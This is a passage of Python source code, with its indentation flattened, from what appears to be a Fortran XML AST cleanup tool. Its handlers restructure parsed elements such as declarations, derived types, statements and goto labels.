        # This holder will be used only when refactoring of the header is needed,
        # such as with the odd syntax of the .eqv. operator
temp_elem_holder = []
target_tags = [
"name",
"literal",
"equiv-operand__equiv-op"
]
need_refactoring = False
for child in root:
self.clean_attrib(child)
if child.tag in self.header_child_tags:
if child.tag == "subroutine-stmt":
current.attrib.update(child.attrib)
else:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
# Add a new interface:[] element into the interface
# function tracker dictionary if current header is
# for declaring interface.
if self.is_interface and cur_elem.tag == "name":
self.interface_functions[cur_elem.attrib['id']] = []
self.interface_function_xml[cur_elem.attrib['id']] = {}
self.cur_interface_name = cur_elem.attrib['id']
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
# If the current header belongs to <function>,
# we need to manipulate the structure of the AST
# to have an equivalent syntax as <subroutine>
if (
parent.tag == "function"
and cur_elem.tag == "names"
):
current.remove(cur_elem)
count = len(self.args_for_function)
cur_elem = ET.SubElement(
current, "arguments",
{"count": str(count)})
for arg in self.args_for_function:
_ = ET.SubElement(
cur_elem, "argument",
{"name": arg,
"is_array": "false"}
)
# If the current header belongs to <subroutine>,
# add it to the arguments_list for later
# array status marking when a function call happens
if (
(parent.tag == "subroutine"
and child.tag == "arguments")
or parent.tag == "function"
):
sub_name = parent.attrib["name"]
self.arguments_list[sub_name] = cur_elem
if cur_elem.tag in target_tags:
temp_elem_holder.append(cur_elem)
if cur_elem.tag == "equiv-operand__equiv-op":
need_refactoring = True
# Handler for the case where label appears under
# the header element. This happens when label
# is assigned to the if statement.
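                # Illustrative Fortran source for this case (an assumed
                # example, not taken from the test programs):
                #     10 IF (X .GT. 0.0) THEN
                # where the statement label "10" surfaces as a <label>
                # under the <if> header.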
if (
traverse == 1
and child.tag == "label"
):
lbl = child.attrib['lbl']
parent.attrib['label'] = lbl
self.encountered_goto_label.append(lbl)
# Label-before case
if (
not self.goto_target_lbl_after
or lbl not in self.goto_target_lbl_after
):
self.goto_label_with_case[lbl] = "before"
if self.label_after:
self.label_before = False
else:
self.label_before = True
if lbl not in self.label_lbl_for_before:
self.label_lbl_for_before.append(lbl)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_header: Empty elements "{child.tag}"'
        # Revert the argument list back to its empty state to accommodate
        # subsequently processed functions
self.args_for_function = []
        # The equivalence operator has a weird AST syntax,
        # so it requires refactoring.
if need_refactoring:
self.reconstruct_header(temp_elem_holder, current)
def handle_tag_body(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the body elements.
<body>
</body>
"""
current.attrib['parent'] = parent.tag
self.body_elem_holder[parent.tag] = current
# Keeping the track of the body's boundary.
if traverse == 1:
if self.body_level['prev'] is None:
self.body_level['grand-prev'] = parent.tag
self.body_level['prev'] = parent.tag
else:
assert (
self.body_level['current'] is not None
), "self.body_level['current'] cannot be None."
self.body_level['grand-prev'] = self.body_level['prev']
self.body_level['prev'] = self.body_level['current']
self.body_level['current'] = parent.tag
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag in self.body_child_tags:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
if traverse == 1:
# Handling conditional <goto-stmt>
if (
parent.tag == "if"
and "goto-stmt" in cur_elem.attrib
):
assert (
"lbl" in cur_elem.attrib
), "Label 'lbl' must be present in <if> attrib"
# goto-stmt counter will be used as
# an identifier for two statements
# that are nested one in another
unique_code = str(self.goto_stmt_counter)
parent.attrib['conditional-goto-stmt-lbl'] = \
cur_elem.attrib['lbl']
parent.attrib['code'] = unique_code
if "goto-move" in cur_elem.attrib:
parent.attrib['goto-move'] = "true"
if "goto-remove" in cur_elem.attrib:
parent.attrib['goto-remove'] = "true"
cur_elem.attrib['conditional-goto-stmt'] = "true"
cur_elem.attrib['code'] = unique_code
# If the <statement> for <goto-stmt> is nested
# under the conditional <if>, then the boundary of
# <statement> remains as the current - 1 level.
cur_elem.attrib['body-level'] = \
self.body_level['prev']
self.body_level['current'] = self.body_level['prev']
else:
self.body_level['grand-prev'] = \
self.body_level['prev']
self.body_level['prev'] = self.body_level['current']
self.body_level['current'] = parent.tag
# Check if conditional goto-stmt is under loop statement
if parent.tag == "loop":
if (
child.tag == "if"
or (
child.tag == "statement"
and "conditional-goto-stmt" in
child.attrib
)
):
self.goto_under_loop = True
# Check a case where <if> under another <if>.
# <if>
# <if>
if (
grandparent.tag == "body"
and "parent" in grandparent.attrib
and grandparent.attrib['parent'] == "if"
):
self.goto_under_if = True
else:
# A Checker for whether current statement is
# nested under the loop.
if "body-level" in cur_elem.attrib:
if cur_elem.attrib['body-level'] == "loop":
self.goto_under_loop = True
else:
self.goto_under_loop = False
new_parent = current
# Reconstruction of statements
if (
"parent" in current.attrib
and (
(not self.goto_under_loop
and not self.goto_under_if
and current.attrib['parent'] == "program")
or (self.goto_under_if
and current.attrib['parent'] == "if")
or (self.goto_under_loop
and current.attrib['parent'] == "loop")
)
):
# Remove statements marked for removal(2nd traverse)
if (
"goto-remove" in child.attrib
or "goto-move" in child.attrib
):
current.remove(cur_elem)
if (
self.reconstruct_after_case_now
and
not self.reconstruction_for_after_done
):
self.reconstruct_goto_after_label(
new_parent, traverse,
self.statements_to_reconstruct_after
)
if self.label_lbl_for_before:
self.continue_elimination = True
if (
self.reconstruct_before_case_now
and
not self.reconstruction_for_before_done
):
reconstruct_target = \
self.statements_to_reconstruct_before
self.reconstruct_goto_before_label(
new_parent, traverse, reconstruct_target
)
if self.label_lbl_for_after:
self.continue_elimination = True
if (
not self.label_lbl_for_before
and not self.label_lbl_for_after
):
self.continue_elimination = False
else:
assert False, f'In handle_tag_body: "{child.tag}" ' \
f'not handled'
else:
if (
child.tag in self.body_child_tags
and child.tag != "statement"
):
_ = ET.SubElement(
current, child.tag, child.attrib
)
elif child.tag == "statement":
if len(child) > 0:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_body: Empty elements "{child.tag}"' \
f' not handled'
if self.is_format:
self.reconstruct_format(parent, traverse)
self.is_format = False
def handle_tag_specification(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the specification elements.
<specification>
</specification>
"""
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
try:
_ = self.specification_child_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_specification: "{child.tag}" not handled'
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
if child.tag != "declaration":
assert (
False
), f'In handle_tag_specification: Empty elements ' \
f'"{child.tag}"'
def handle_tag_declaration(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the declaration elements.
<declaration>
</declaration>
"""
is_derived_type_dimension_setting = False
is_end_of_one_dimension = False
dim_number = 0
for child in root:
self.clean_attrib(child)
# Temporarily hold the declaring variable's type.
if child.tag == "type" and "name" in child.attrib:
self.variable_type = child.attrib['name']
            # Keep track of array dimension information in derived types.
if child.tag == "explicit-shape-spec-list__begin":
is_derived_type_dimension_setting = True
self.dim += 1
dim_number += 1
self.derived_type_array_dimensions[self.dim] = []
elif child.tag == "explicit-shape-spec":
is_end_of_one_dimension = True
dim_number += 1
elif child.tag == "explicit-shape-spec-list":
is_derived_type_dimension_setting = False
if len(child) > 0 or child.text:
if child.tag in self.declaration_child_tags:
if child.tag == "format":
self.is_format = True
self.format_holder.append(child)
elif (
child.tag == "name"
or child.tag == "literal"
):
if is_derived_type_dimension_setting:
child.attrib["dim-number"] = str(dim_number)
self.derived_type_array_dimensions[self.dim].append(child)
else:
self.derived_type_var_holder_list.append(child)
else:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "dimensions":
self.is_array = True
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
elif (
child.tag == "component-array-spec"
or child.tag == "operation"
):
self.derived_type_var_holder_list.append(child)
else:
assert (
False
), f'In handle_tag_declaration: "{child.tag}" not handled'
else:
if child.tag in self.declaration_child_tags:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "saved-entity":
# If you find saved-entity, add the element to a list
# and remove it from the XML since you want to shift
# it below save-stmt
self.saved_entities.append(cur_elem)
current.remove(cur_elem)
elif child.tag == "save-stmt":
# If you find save-stmt, check if it contains
# saved-entities and add it below this XML element
if len(self.saved_entities) > 0:
for item in self.saved_entities:
_ = ET.SubElement(cur_elem, item.tag,
item.attrib)
# Reinitialize this list since you'll need an
# empty one for the next SAVE statement
self.saved_entities = []
elif (
child.tag == "component-decl"
or child.tag == "component-decl-list"
or child.tag == "component-decl-list__begin"
):
current.attrib['type'] = "derived-type"
self.derived_type_var_holder_list.append(child)
elif child.tag == "component-array-spec":
self.derived_type_var_holder_list.append(child)
else:
if (
child.tag not in self.unnecessary_tags
and child.tag not in self.derived_type_child_tags
):
assert (
False
                        ), f'In handle_tag_declaration: Empty elements "' \
f'{child.tag}" not handled'
if self.is_array:
self.is_array = False
if self.is_character:
self.is_character = False
# If is_derived_type is true,
# reconstruct the derived type declaration AST structure
if self.is_derived_type:
if self.derived_type_var_holder_list:
                # Modify or add the 'name' attribute of the MAIN (or outermost)
                # <type> element with the derived type name
self.parent_type.set("name", self.cur_derived_type_name)
self.reconstruct_derived_type_declaration()
self.is_derived_type = False
self.variable_type = None
if self.dimensions_holder:
self.restruct_declaration(current, parent)
parent.remove(current)
self.dimensions_holder = None
# Keep a track of all declared variables by scope
if (
"type" in current.attrib
and current.attrib['type'] == "variable"
):
if self.current_scope not in self.variables_by_scope:
self.variables_by_scope[self.current_scope] = {}
for elem in current:
if elem.tag == "type":
var_type = elem.attrib['name']
elif elem.tag == "variables":
for subElem in elem:
if subElem.tag == "variable":
self.variables_by_scope[self.current_scope][subElem.attrib['id']] = var_type
def handle_tag_type(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
        between the type elements.
<type>
</type>
"""
if current.attrib.get("name"):
if current.attrib["name"].lower() == "character":
self.is_character = True
current.set("string_length", str(1))
dim_number = 0
is_derived_type_dimension_setting = False
for child in root:
self.clean_attrib(child)
if "keyword2" in child.attrib:
if child.attrib['keyword2'] == "":
current.attrib['keyword2'] = "none"
else:
current.attrib['keyword2'] = child.attrib['keyword2']
else:
current.attrib['keyword2'] = "none"
if child.tag == "type":
# Having a nested "type" indicates that this is
# a "derived type" declaration.
# In other word, this is a case of
# <type>
# <type>
# ...
# </type>
# </type>
self.is_derived_type = True
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parent_type = current
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
elif child.tag == "derived-type-stmt":
                # If child.tag is derived-type-stmt while self.is_derived_type
                # is not true, it indicates that only a single variable
                # was declared under the derived type declaration, so the syntax
                # has no nested type case like above. Thus, in order to make
                # the syntax consistent, add another type element and nest
                # everything under it.
if not self.is_derived_type:
self.is_derived_type = True
type_elem = ET.SubElement(current, current.tag,
current.attrib)
type_elem.set("is_derived_type", str(self.is_derived_type))
type_elem.set("name", child.attrib['id'])
self.parent_type = current
# Modify or add 'name' attribute of the <type>
# elements with the name of derived type name
current.set("name", child.attrib['id'])
                # And store the derived type name for
                # later setting the outermost <type> element's name attribute
self.cur_derived_type_name = child.attrib['id']
elif child.tag == "explicit-shape-spec-list__begin":
is_derived_type_dimension_setting = True
self.dim += 1
dim_number += 1
self.derived_type_array_dimensions[self.dim] = []
elif child.tag == "explicit-shape-spec":
is_end_of_one_dimension = True
dim_number += 1
elif child.tag == "explicit-shape-spec-list":
is_derived_type_dimension_setting = False
elif child.tag == "intrinsic-type-spec":
if self.is_derived_type:
self.derived_type_var_holder_list.append(child)
elif child.tag == "derived-type-spec":
                if self.variable_type is None:
self.variable_type = child.attrib['typeName']
if not self.is_derived_type:
self.is_derived_type = True
current.set("name", child.attrib['typeName'])
else:
self.derived_type_var_holder_list.append(child)
elif child.tag == "literal":
if self.is_character:
self.derived_type_var_holder_list.append(child)
current.set("string_length", str(child.attrib["value"]))
elif is_derived_type_dimension_setting:
child.attrib["dim-number"] = str(dim_number)
self.derived_type_array_dimensions[self.dim].append(child)
else:
self.derived_type_var_holder_list.append(child)
elif (
is_derived_type_dimension_setting
and child.tag == "name"
):
child.attrib["dim-number"] = str(dim_number)
self.derived_type_array_dimensions[self.dim].append(child)
elif (
child.tag == "component-array-spec"
or child.tag == "operation"
):
self.derived_type_var_holder_list.append(child)
elif child.tag in self.dtype_var_declaration_tags:
self.derived_type_var_holder_list.append(child)
elif child.tag == "length":
cur_elem = ET.SubElement(current, child.tag, child.attrib)
self.parseXMLTree(child, cur_elem, current, parent, traverse)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert False, f'In handle_tag_type: "{child.tag}" not ' \
f'handled'
# This will mark whether this type declaration is for a derived type
# declaration or not
current.set("is_derived_type", str(self.is_derived_type))
def handle_tag_variables(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the variables elements.
<variables>
</variables>
"""
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
if (
child.tag == "variable"
and self.current_scope in self.argument_types
and child.attrib['name'] in self.argument_types[
self.current_scope]
):
self.argument_types[self.current_scope][child.attrib[
'name']] = self.variable_type
# Up to this point, all the child (nested or sub) elements were
# <variable>
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
cur_elem.set("is_array", str(self.is_array).lower())
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
if (
child.tag == "variable"
and child.attrib
):
grandparent = ET.SubElement(
current, child.tag, child.attrib
)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
child.tag == "variable"
), f'In handle_tag_variables: "{child.tag}" not handled'
def handle_tag_variable(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the variables elements.
<variable>
</variable>
"""
# Store all declared variables based on their array status
if current.attrib['is_array'] == "true":
self.declared_array_vars.update(
{current.attrib['name']: self.current_scope}
)
else:
self.declared_non_array_vars.update(
{current.attrib['name']: self.current_scope}
)
if self.is_character:
self.character_var_list.append(current.attrib['name'])
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag in self.variable_child_tags:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
if child.tag == "dimensions":
current.attrib['is_array'] = "true"
self.declared_array_vars.update(
{current.attrib['name']: self.current_scope}
)
del self.declared_non_array_vars[current.attrib['name']]
current.remove(self.dimensions_holder)
else:
assert (
False
), f'In handle_tag_variable: "{child.tag}" not handled'
else:
if child.tag == "entity-decl":
current.attrib.update(child.attrib)
else:
assert (
False
), f'In handle_tag_variable: Empty elements "{child.tag}"' \
f' not handled'
def handle_tag_constants(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements between the
constants elements.
<constants>
</constants>
"""
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
cur_elem.set("is_array", str(self.is_array).lower())
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
elif child.tag == "parameter-stmt":
pass
else:
assert (
child.tag == "constant"
), f'In handle_tag_constant: "{child.tag}" not handled'
def handle_tag_constant(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements between the
constants elements.
<constant>
</constant>
"""
# Store all declared variables based on their array status
if current.attrib['is_array'] == "true":
self.declared_array_vars.update(
{current.attrib['name']: self.current_scope}
)
else:
self.declared_non_array_vars.update(
{current.attrib['name']: self.current_scope}
)
for child in root:
self.clean_attrib(child)
if child.text or len(child) > 0:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
False
), f'In handle_tag_constant: Empty elements "{child.tag}" ' \
f'not handled'
def handle_tag_statement(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the statement elements.
<statement>
</statement>
"""
if traverse == 1:
current.attrib['body-level'] = self.body_level['current']
        label_presented = False
        for child in root:
self.clean_attrib(child)
if child.tag in self.statement_child_tags:
if child.tag == "stop":
self.is_stop = True
current.attrib['has-stop'] = "true"
current.attrib['goto-remove'] = "true"
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "label":
current.attrib['label'] = child.attrib['lbl']
label_presented = True
lbl = child.attrib['lbl']
self.encountered_goto_label.append(lbl)
if traverse == 1:
# Label-before case
if (
not self.goto_target_lbl_after
or lbl not in self.goto_target_lbl_after
):
self.goto_label_with_case[lbl] = "before"
                            # Since we want to handle the label_after case before
                            # label_before when both cases appear in the code,
                            # we ignore all label_before cases until the _after
                            # case gets handled. Thus, mark label_before as false.
if self.label_after:
self.label_before = False
else:
self.label_before = True
if lbl not in self.label_lbl_for_before:
self.label_lbl_for_before.append(lbl)
# Label-after case
else:
self.goto_label_with_case[lbl] = "after"
self.collect_stmts_after_goto = False
self.collect_stmts_after_label = True
if lbl not in self.label_lbl_for_after:
self.label_lbl_for_after.append(lbl)
if (
self.label_before
or lbl in self.label_lbl_for_before
):
current.attrib['goto-move'] = "true"
else:
current.attrib['goto-remove'] = "true"
current.attrib['target-label-statement'] = "true"
# Since <format> is followed by <label>,
# check the case and undo all operations done for goto.
if child.tag == "format" and label_presented:
                    del self.label_lbl_for_before[-1]
del current.attrib['target-label-statement']
del current.attrib['goto-move']
self.label_before = False
else:
assert (
traverse > 1
), "In handle_tag_statement. Reconstruction must be " \
"done in traverse > 1."
if self.collecting_stmts_done:
self.reconstruct_after_case_now = True
self.collecting_stmts_done = False
if child.text or len(child) > 0:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
elif child.tag == "name":
                # If a 'name' tag is a direct sub-element of 'statement',
                # it indicates that this statement is handling
                # (usually assigning) derived type variables. Thus,
                # in order to be consistent with the other assignment syntax,
                # remove the outer name element (but store it in the
                # temporary holder) and reconstruct it before the end of
                # the statement.
assert is_empty(self.derived_type_var_holder_list)
self.derived_type_var_holder_list.append(child.attrib['id'])
self.parseXMLTree(
child, current, current, parent, traverse
)
elif child.tag == "goto-stmt":
# self.goto_stmt_level = parent.attrib['parent']
# <goto-stmt> met, increment the counter
self.goto_stmt_counter += 1
                # If a goto-stmt was seen, we do not construct an element for it.
                # However, we collect the information (attributes) that is
                # associated with the existing OFP-generated element.
self.need_goto_elimination = True
self.if_appear_before_goto = False
target_lbl = child.attrib['target_label']
current.attrib['goto-stmt'] = "true"
current.attrib['lbl'] = target_lbl
_ = ET.SubElement(current, child.tag, child.attrib)
                # Reaching a goto-stmt is a flag to stop collecting statements
if traverse == 1:
if (
"type" in parent.attrib
and parent.attrib['type'] == "else"
):
self.goto_under_else = True
self.encountered_goto_label.append(target_lbl)
if self.collect_stmts_after_label:
current.attrib['goto-remove'] = "true"
current.attrib['next-goto'] = "true"
self.statements_to_reconstruct_after[
'stmts-follow-label'].append(current)
self.collect_stmts_after_label = False
self.collecting_stmts_done = True
# A case where label appears "before" goto
if target_lbl in self.label_lbl_for_before:
self.goto_label_with_case[target_lbl] = "before"
self.statements_to_reconstruct_before[
'count-gotos'] += 1
self.goto_target_lbl_before.append(target_lbl)
# A case where label appears "after" goto
else:
self.goto_label_with_case[target_lbl] = "after"
self.statements_to_reconstruct_after['count-gotos'] += 1
if "parent-goto" not in current.attrib:
current.attrib['skip-collect'] = "true"
self.goto_target_lbl_after.append(target_lbl)
self.collect_stmts_after_goto = True
self.label_after = True
else:
if target_lbl in self.label_lbl_for_before:
assert (
traverse > 1
), "Reconstruction cannot happen in the first traverse"
if self.label_before:
self.reconstruct_before_case_now = True
return
else:
assert (
False
), f'In handle_tag_statement: "{child.tag}" not handled'
# Statement collector (1st traverse)
if traverse == 1:
if self.label_before and not self.label_after:
                # Since we do not want to extract the stop statement from
                # a body that is not the main body, check before extracting.
if "has-stop" not in current.attrib:
current.attrib['goto-move'] = "true"
self.statements_to_reconstruct_before[
'stmts-follow-label'].append(current)
else:
if (
parent.tag == "body"
and parent.attrib['parent'] == "program"
):
self.statements_to_reconstruct_before[
'stmts-follow-label'].append(current)
elif self.label_after:
if self.collect_stmts_after_goto:
current.attrib['goto-remove'] = "true"
if "has-stop" not in current.attrib:
self.statements_to_reconstruct_after[
'stmts-follow-goto'].append(current)
else:
if (
parent.tag == "body"
and parent.attrib['parent'] == "program"
):
self.statements_to_reconstruct_after[
'stmts-follow-goto'].append(current)
if "goto-stmt" in current.attrib:
self.stmts_after_goto['goto-stmts'].append(
current.attrib['lbl'])
elif "target-label-statement" in current.attrib:
self.stmts_after_goto['labels'].append(
current.attrib['label'])
elif self.collect_stmts_after_label:
current.attrib['goto-remove'] = "true"
self.statements_to_reconstruct_after[
'stmts-follow-label'].append(current)
if (
(
parent.tag == "body"
and parent.attrib['parent'] == "program"
and "has-stop" in current.attrib
)
or self.goto_under_loop
):
self.collect_stmts_after_label = False
self.reconstruct_after_case_now = True
def handle_tag_assignment(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the assignment elements.
<assignment>
</assignment>
"""
for child in root:
self.clean_attrib(child)
cur_elem = ET.SubElement(current, child.tag, child.attrib)
if child.tag == "target" or child.tag == "value":
self.parseXMLTree(child, cur_elem, current, parent, traverse)
else:
assert (
False
), f'In handle_tag_assignment: "{child.tag}" not handled'
def handle_tag_target(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the target elements.
<target>
</target>
"""
for child in root:
self.clean_attrib(child)
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "name":
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
if child.tag == "name" and self.need_reconstruct:
self.reconstruct_name_element(cur_elem, current)
else:
assert (
False
), f'In handle_tag_target: "{child.tag}" not handled'
def handle_tag_names(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the names elements.
<names>
<names>
"""
for child in root:
self.clean_attrib(child)
if child.tag == "name":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if "id" in child.attrib and self.is_interface:
self.interface_functions[self.cur_interface_name].append(
child.attrib['id'])
self.interface_function_xml[self.cur_interface_name][
child.attrib['id']] = cur_elem
if grandparent.tag == "function":
self.args_for_function.append(cur_elem.attrib['id'])
# If the element holds sub-elements, call the XML tree parser
# with created new <name> element
if len(child) > 0 or child.text:
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
# Else, update the element's attribute
# with the default <name> element attributes
else:
attributes = {
"hasSubscripts": "false",
"is_array": "false",
"numPartRef": "1",
"type": "ambiguous",
}
# Check if the variable is a function argument
if self.is_function_arg:
attributes['is_arg'] = "true"
else:
attributes['is_arg'] = "false"
cur_elem.attrib.update(attributes)
else:
assert False, f'In handle_tag_names: "{child.tag}" not handled'
def handle_tag_name(self, root, current, parent, _, traverse):
"""This function handles cleaning up the XML elements between
the name elements.
<name>
        </name>
There are three different types of names that the type attribute can
hold:
(1) variable - Simple (single) variable or an array
(2) procedure - Function (or procedure) call
(3) ambiguous - None of the above two type
"""
if (
"id" in current.attrib
and current.attrib['id'] in self.declared_array_vars
):
current.attrib['is_array'] = "true"
else:
current.attrib['is_array'] = "false"
# If 'id' attribute holds '%' symbol, it's an indication of derived type
# referencing. Thus, clean up the 'id' and reconstruct the <name> AST.
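        # For example, an id such as "x%y%z" is split into the variables
        # x, y, and z, which reconstruct_derived_type_names later reassembles
        # into the nested <name> AST.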
if "id" in current.attrib and "%" in current.attrib['id']:
self.is_derived_type_ref = True
self.clean_derived_type_ref(current)
# Default attribute values
current.attrib['hasSubscripts'] = "false"
current.attrib['is_arg'] = "false"
current.attrib['numPartRef'] = "1"
current.attrib['type'] = "ambiguous"
for child in root:
self.clean_attrib(child)
if child.text:
if (
child.tag == "subscripts"
or child.tag == "assignment"
):
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "subscripts":
                        # If the current name is for caller arguments,
                        # mark the name of the function in the subscripts
                        # as one of its attributes
if parent.tag == "call":
cur_elem.attrib['fname'] = current.attrib['id']
current.attrib['hasSubscripts'] = "true"
# Check whether the variable is an array AND the
# variable is for the current scope. This is important
# for derived type variable referencing
if (
current.attrib['id'] in self.declared_array_vars
and self.declared_array_vars[
current.attrib['id']
] == self.current_scope
):
# Since the procedure "call" has a same AST syntax
# as an array, check its type and set the "is_array"
# value
assert (
current.attrib['type'] != "procedure"
), "Trying to assign a procedure call to while " \
"is_array true."
current.attrib['is_array'] = "true"
elif (
current.attrib['id']
in self.declared_non_array_vars
and self.declared_non_array_vars[
current.attrib['id']
] == self.current_scope
and current.attrib['id'] not in
self.character_var_list
):
current.attrib['hasSubscripts'] = "false"
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
elif child.tag == "output":
assert (
is_empty(self.derived_type_var_holder_list)
), "derived_type_var holder must be empty."
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.derived_type_var_holder_list.append(root.attrib['id'])
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
elif child.tag == "name":
self.parseXMLTree(
child, current, current, parent, traverse
)
else:
assert (
False
), f'In self.handle_tag_name: "{child.tag}" not handled'
else:
if child.tag == "generic_spec":
_ = ET.SubElement(
current, child.tag, child.attrib
)
elif child.tag == "data-ref":
current.attrib.update(child.attrib)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In self.handle_tag_name: Empty elements ' \
f'"{child.tag}" not handled'
# If the name element is for handling
# derived type references, reconstruct it
if self.derived_type_refs:
self.reconstruct_derived_type_names(current)
self.is_derived_type_ref = False
self.need_reconstruct = True
def handle_tag_value(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the value elements.
<value>
</value>
"""
function_call = False
for child in root:
self.clean_attrib(child)
cur_elem = ET.SubElement(current, child.tag, child.attrib)
if (
child.tag == "name"
and child.attrib['id'] in self.arguments_list
):
# if 'id' is in the arguments_list, it indicates that
# the RHS of the assignment is a function call
self.call_function = True
function_call = True
current.attrib['fname'] = child.attrib['id']
try:
_ = self.value_child_tags.index(child.tag)
except ValueError:
assert False, f'In handle_tag_value: "{child.tag}" not handled'
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
# If current assignment is done with a function call,
# then update function definition's arguments with array status
if function_call:
self.update_function_arguments(current)
if (
child.tag == "name"
and self.need_reconstruct
):
self.reconstruct_name_element(cur_elem, current)
def handle_tag_literal(
self, root, current, parent, grandparent, traverse
):
"""This function handles cleaning up the XML elements
between the literal elements.
<literal>
</literal>
"""
if '"' in current.attrib['value']:
current.attrib['value'] = self.clean_id(current.attrib['value'])
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
if child.tag == "stop":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
elif child.tag == "literal":
cur_elem = ET.SubElement(
parent, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, parent, grandparent, traverse
)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_literal: "{child.tag}" not handled'
else:
if child.tag == "data-stmt-constant":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_literal: Empty "{child.tag}" not handled'
def handle_tag_dimensions(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the dimensions elements.
<dimensions>
</dimensions>
"""
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if child.tag == "dimension":
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_dimensions: "{child.tag}" not ' \
f'handled'
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_dimensions: Empty "{child.tag}" not ' \
f'handled'
if parent.tag == "variable":
self.dimensions_holder = current
def handle_tag_dimension(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the dimension elements.
<dimension>
</dimension>
"""
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
if (
child.tag == "literal"
or child.tag == "range"
):
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_dimension: "{child.tag}" not handled'
elif child.tag == "literal":
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
else:
try:
_ = self.unnecessary_tags.index(child.tag)
except ValueError:
assert (
False
), f'In handle_tag_dimension: Empty "{child.tag}" not ' \
f'handled'
def handle_tag_loop(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the do loop elements.
<loop>
</loop>
"""
for child in root:
self.clean_attrib(child)
if child.text or len(child) > 0:
if child.tag in self.loop_child_tags:
if child.tag == "format":
self.is_format = True
self.format_holder.append(child)
else:
cur_elem = ET.SubElement(
current, child.tag, child.attrib
)
self.parseXMLTree(
child, cur_elem, current, parent, traverse
)
else:
assert (
child.tag in self.unnecessary_tags
), f'In self.handle_tag_loop: "{child.tag}" not handled'
def handle_tag_index_variable_or_range(
self, root, current, parent, _, traverse
):
"""This function handles cleaning up the XML elements
between the index_variable or range elements.
<index_variable> or <range>
</index_variable> </range>
"""
for child in root:
self.clean_attrib(child)
if len(child) > 0 or child.text:
